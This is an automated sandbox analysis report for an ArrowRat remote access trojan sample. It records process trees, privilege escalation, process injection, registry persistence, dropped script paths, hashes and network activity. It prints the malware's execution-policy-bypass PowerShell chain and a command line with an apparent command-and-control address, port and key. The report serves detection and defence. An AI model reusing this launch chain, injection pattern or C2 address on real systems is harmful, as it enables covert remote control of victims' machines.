Malware Analysis Report

2024-10-10 10:15

Sample ID 230517-w5a1ysfb3z
Target 222.txt
SHA256 abf2dcd61f4a9717e372e32dcfcb02831e51130f4a91fa87bb7954785db435fd
Tags arrowrat client persistence rat
Score 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
    Enterprise Matrix V6
Analysis: static1
    Detonation Overview
    Signatures
Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
Analysis: behavioral2
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

Score 10/10

SHA256 abf2dcd61f4a9717e372e32dcfcb02831e51130f4a91fa87bb7954785db435fd

Threat Level: Known bad

The file 222.txt was found to be: Known bad.

Malicious Activity Summary

arrowrat client persistence rat

ArrowRat

Modifies Installed Components in the registry

Checks computer location settings

Suspicious use of SetThreadContext

Enumerates physical storage devices

Modifies registry class

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported 2023-05-17 18:29

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted 2023-05-17 18:29

Reported 2023-05-17 18:33

Platform win7-20230220-en

Max time kernel 30s

Max time network 33s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\222.ps1

Signatures

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\222.ps1

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\ProgramData\Unlimited\ISO\Binnot.vbs"

C:\Windows\System32\cmd.exe

cmd /c ""C:\ProgramData\Unlimited\ISO\Binnot.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\Unlimited\ISO\Binnot.ps1

Network

N/A

Files

memory/2008-58-0x000000001B280000-0x000000001B562000-memory.dmp

memory/2008-59-0x0000000002310000-0x0000000002318000-memory.dmp

memory/2008-60-0x0000000002350000-0x00000000023D0000-memory.dmp

memory/2008-61-0x0000000002350000-0x00000000023D0000-memory.dmp

memory/2008-62-0x0000000002350000-0x00000000023D0000-memory.dmp

memory/2008-63-0x0000000002350000-0x00000000023D0000-memory.dmp

C:\ProgramData\Unlimited\ISO\Binnot.vbs

MD5 8444901b66d6f83f3a684f1b44646868
SHA1 69c9c40aef3734959b4ce5f07005bf13c07646f9
SHA256 cfeaafc87ceec9986f37f6a42ecfa39260f98c951404df95da5e074141add5da
SHA512 7493b0d40c9c914c8968b42752b1d14d415e7bccff07f9bf2ab976d77517e12a456f142ee786527c4e536fab3e4156b21ce353f51f5925bbc405937ad7929bbb

C:\ProgramData\Unlimited\ISO\Binnot.bat

MD5 f1d747a7825a5db756d428a5254d244e
SHA1 7db56fe57492bd856c787cd2a836eff4f2ce5e01
SHA256 5863b76caee43b2f1efdd2322f2e5731b1537d1deeb35e860cd75a8304fe4ddf
SHA512 4b1f63df96b8f9e2a381855974b2efab5bd48ae342b1e29a51661d0514ba6f8e62d23e3e58a9a9f978d39880ab03a9b9bf72ab52a546a965da20daa18c4d246d

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 340e1993eb40b8bed81349fab46f89c5
SHA1 13acc43c5621e815bf6c8371f360b9fa29625fdc
SHA256 7caa47d4b27f7a6b91453329a3471a0b06ff6f7c67fc060aa15ff98385e6e46c
SHA512 abc68892589462b10615969593c6f92be3f6d6afda4683314ced7c1b083f039e8b6986692e1eb320b4f982041334a6c34f6b84502cb171c917478fb37b9093d9

memory/672-79-0x000000001B290000-0x000000001B572000-memory.dmp

memory/672-80-0x00000000022F0000-0x00000000022F8000-memory.dmp

C:\ProgramData\Unlimited\ISO\Binnot.ps1

MD5 58ef18971b1520648e0c6d67036251ff
SHA1 68bd1ee657ff233f6a1ee453914aaecdeb845284
SHA256 226b14799e579e28954937fa3ffdb7d0e5dcd10360b35c329a7246a23be4b4b3
SHA512 9b7f04aca4b3e2af5aafdc9ea30c1722722d668078bea8b0aaa2394d0cb50ac75716fb9173d4084bd5a9cfaa279bd94404b64c140532daa5b3bdd66842f332d2

memory/672-82-0x0000000002530000-0x00000000025B0000-memory.dmp

memory/672-83-0x0000000002530000-0x00000000025B0000-memory.dmp

memory/672-84-0x0000000002530000-0x00000000025B0000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted 2023-05-17 18:29

Reported 2023-05-17 18:33

Platform win10v2004-20230220-en

Max time kernel 149s

Max time network 154s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\222.ps1

Signatures

ArrowRat

rat arrowrat

Modifies Installed Components in the registry

persistence
Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A

Enumerates physical storage devices

Modifies registry class

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1013461898-3711306144-4198452673-1000\{87E2689E-2912-4625-B426-1D3CF6DF3F78} | C:\Windows\explorer.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 33 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 34 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 35 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 36 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 33 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 34 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 35 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 36 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 33 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 34 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 35 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 1436 wrote to memory of 4100 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WScript.exe
PID 1436 wrote to memory of 4100 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WScript.exe
PID 4100 wrote to memory of 4220 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\system32\cmd.exe
PID 4100 wrote to memory of 4220 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\system32\cmd.exe
PID 4220 wrote to memory of 2300 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4220 wrote to memory of 2300 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4472 wrote to memory of 4952 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\system32\cmd.exe
PID 4472 wrote to memory of 4952 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\system32\cmd.exe
PID 4952 wrote to memory of 2404 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4952 wrote to memory of 2404 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2404 wrote to memory of 1684 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe
PID 2404 wrote to memory of 1684 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe
PID 2404 wrote to memory of 1684 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe
PID 2404 wrote to memory of 1684 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe
PID 2404 wrote to memory of 1684 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe
PID 2404 wrote to memory of 1684 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe
PID 2404 wrote to memory of 1684 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe
PID 2404 wrote to memory of 1684 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe
PID 1684 wrote to memory of 3584 | N/A | C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe | C:\Windows\explorer.exe
PID 1684 wrote to memory of 3584 | N/A | C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe | C:\Windows\explorer.exe
PID 1684 wrote to memory of 2660 | N/A | C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1684 wrote to memory of 2660 | N/A | C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1684 wrote to memory of 2660 | N/A | C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1684 wrote to memory of 2660 | N/A | C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1684 wrote to memory of 2660 | N/A | C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1684 wrote to memory of 2660 | N/A | C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1684 wrote to memory of 2660 | N/A | C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1684 wrote to memory of 2660 | N/A | C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\222.ps1

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\ProgramData\Unlimited\ISO\Binnot.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Unlimited\ISO\Binnot.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\Unlimited\ISO\Binnot.ps1

C:\Windows\System32\WScript.exe

C:\Windows\System32\WScript.exe "C:\ProgramData\Unlimited\ISO\Unlimited.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Unlimited\ISO\Unlimited.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\Unlimited\ISO\Unlimited.ps1

C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe

"C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe"

C:\Windows\explorer.exe

"C:\Windows\explorer.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 185.252.178.121 1337 qCDAaGyIF

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 50.4.107.13.in-addr.arpa | udp
US | 20.189.173.12:443 | N/A | tcp
US | 8.8.8.8:53 | 73.254.224.20.in-addr.arpa | udp
US | 93.184.220.29:80 | N/A | tcp
NL | 87.248.202.1:80 | N/A | tcp

Files

memory/1436-138-0x0000029038170000-0x0000029038192000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eeamc5sh.ab5.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1436-143-0x00000290366E0000-0x00000290366F0000-memory.dmp

memory/1436-144-0x00000290366E0000-0x00000290366F0000-memory.dmp

memory/1436-145-0x00000290366E0000-0x00000290366F0000-memory.dmp

C:\ProgramData\Unlimited\ISO\Binnot.vbs

MD5 8444901b66d6f83f3a684f1b44646868
SHA1 69c9c40aef3734959b4ce5f07005bf13c07646f9
SHA256 cfeaafc87ceec9986f37f6a42ecfa39260f98c951404df95da5e074141add5da
SHA512 7493b0d40c9c914c8968b42752b1d14d415e7bccff07f9bf2ab976d77517e12a456f142ee786527c4e536fab3e4156b21ce353f51f5925bbc405937ad7929bbb

C:\ProgramData\Unlimited\ISO\Binnot.bat

MD5 f1d747a7825a5db756d428a5254d244e
SHA1 7db56fe57492bd856c787cd2a836eff4f2ce5e01
SHA256 5863b76caee43b2f1efdd2322f2e5731b1537d1deeb35e860cd75a8304fe4ddf
SHA512 4b1f63df96b8f9e2a381855974b2efab5bd48ae342b1e29a51661d0514ba6f8e62d23e3e58a9a9f978d39880ab03a9b9bf72ab52a546a965da20daa18c4d246d

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 223bd4ae02766ddc32e6145fd1a29301
SHA1 900cfd6526d7e33fb4039a1cc2790ea049bc2c5b
SHA256 1022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e
SHA512 648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc

memory/2300-160-0x000001D058610000-0x000001D058620000-memory.dmp

memory/2300-161-0x000001D058610000-0x000001D058620000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3003448ee73abf14d5c8011a37c40600
SHA1 b88e9cdbae2e27a25f0858fc0b6d79533fb160d8
SHA256 ae448d99735879ecee1dc3088c8f7553ebff461b96172d8f3cb5ff2fa2a12d4a
SHA512 0fe52614eec6d75a265ae380aaa1eb153bc35a1baae4d118637798575169d9dba5ad751efab5d7f5dbe9764bfb96e9ae76577a3487429a3383b5b08d5402fe3a

C:\ProgramData\Unlimited\ISO\Binnot.ps1

MD5 58ef18971b1520648e0c6d67036251ff
SHA1 68bd1ee657ff233f6a1ee453914aaecdeb845284
SHA256 226b14799e579e28954937fa3ffdb7d0e5dcd10360b35c329a7246a23be4b4b3
SHA512 9b7f04aca4b3e2af5aafdc9ea30c1722722d668078bea8b0aaa2394d0cb50ac75716fb9173d4084bd5a9cfaa279bd94404b64c140532daa5b3bdd66842f332d2

memory/2300-173-0x000001D058610000-0x000001D058620000-memory.dmp

C:\ProgramData\Unlimited\ISO\Unlimited.vbs

MD5 c281573a4f6f6ac5b06f2e9436400093
SHA1 c2699e56b7c26ac9cdfe1f500b49151b69bd6ad8
SHA256 3c312f2547fbc4a3ffe5c1b6d91c03494d7653fd758d886473f2ae6656de11f7
SHA512 76aed1be4b48d2fc019c9136eb74b3a96b56b89c74cb3b3347f8eefc592fee24a2a94ea3babd4b394080c7663864781c89afe761e59f8d65aed147d1ed422026

C:\ProgramData\Unlimited\ISO\Unlimited.bat

MD5 eff64d56c40c54a1f9891d7a6ad54899
SHA1 dbaf9a4aeb8484690d6118155d59158598f0799a
SHA256 c846b192c5dc974c6d63024a06d4c31b2f7c8baa61af133e5b00009b68df86e2
SHA512 c89f82c7807b947e10f82740c01d5cb996e95c4a6e79375eee6b981d0ed911d31537e964d0cefef874c7e12f9f4baf237f0f9ed44de866abd3c8030a25b7cc83

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0c77ce1db08e7f1b2bc9896a13b4f7a5
SHA1 3de7b852f908b16834f9484bce8eebd4d7389ec1
SHA256 dcb3cb7065cee59e6f4e62405ef4c5418a04a35a1ac04db0b846851bc7ec967f
SHA512 5244fa2ce993c07dfbbeac86360c2e49e86c0957a016624251e917223b0d1c0afd5fefdf17b397b298c194b5699c8696dd7e59f379d6eae98665be361f077b29

C:\ProgramData\Unlimited\ISO\Unlimited.ps1

MD5 e1bb0ce912e111d3b891de922e21a739
SHA1 8ae8856cb82f3340b2b2b1a06b3123b549005549
SHA256 5f79c8a3a6ff96ae8ccf96dfc486ae1f5e8edeabb663e6f90be89aeb727457cc
SHA512 bbb85cb9160a52d1bf464b7b459caaf9f808407031c423790be65e820fc8cce39c99c6096110228e8a8b33ddf5bff75350cbda2f6b01fc500f5169a4142528bf

memory/2404-188-0x0000022D7F170000-0x0000022D7F180000-memory.dmp

memory/2404-189-0x0000022D7F170000-0x0000022D7F180000-memory.dmp

memory/2404-190-0x0000022D7F170000-0x0000022D7F180000-memory.dmp

memory/1684-191-0x0000000000400000-0x000000000042C000-memory.dmp

memory/1684-193-0x00000000059E0000-0x0000000005F84000-memory.dmp

memory/1684-194-0x0000000005510000-0x00000000055AC000-memory.dmp

memory/2660-195-0x0000000000400000-0x0000000000418000-memory.dmp

memory/2660-197-0x00000000053D0000-0x0000000005462000-memory.dmp

memory/2660-198-0x00000000056A0000-0x00000000056B0000-memory.dmp

memory/2660-199-0x0000000005BB0000-0x0000000005C16000-memory.dmp